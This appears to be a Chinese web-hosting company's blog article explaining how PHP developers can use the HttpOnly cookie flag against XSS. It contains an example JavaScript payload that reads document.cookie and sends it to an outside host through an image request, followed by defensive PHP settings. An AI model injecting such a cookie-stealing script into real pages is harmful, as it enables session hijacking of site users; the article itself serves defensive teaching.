重庆分公司,新征程启航

为企业提供网站建设、域名注册、服务器等服务

如何在php项目中使用httponly预防xss攻击-创新互联

这篇文章将为大家详细讲解有关如何在php项目中使用httponly预防xss攻击,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

创新互联专注于江苏企业网站建设,响应式网站建设,成都做商城网站。江苏网站建设公司,为江苏等地区提供建站服务。全流程按需定制开发,专业设计,全程项目跟踪,创新互联专业和态度为您提供的服务

xss的概念就不用多说了,它的危害是极大的,这就意味着一旦你的网站出现xss漏洞,就可以执行任意的js代码,最可怕的是攻击者利用js获取cookie或者session劫持,如果这里面包含了大量敏感信息(身份信息,管理员信息)等,那完了。。。

如下js获取cookie信息:

复制代码 代码如下:


url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;


一般cookie都是从document对象中获取的,现在浏览器在设置Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的document对象中就看不到Cookie了。

PHP设置HttpOnly

复制代码 代码如下:


//在php.ini中,session.cookie_httponly = ture 来开启全局的Cookie的HttpOnly属性
ini_set("session.cookie_httponly", 1);

//或者setcookie()的第七个参数设置为true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);


对于PHP5.1以前版本的PHP通过:

复制代码 代码如下:


header("Set-Cookie: hidden=value; httpOnly");


关于如何在php项目中使用httponly预防xss攻击就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。


分享文章:如何在php项目中使用httponly预防xss攻击-创新互联
当前路径:http://cqcxhl.com/article/jgosi.html

其他资讯

在线咨询
服务热线
服务热线:028-86922220
TOP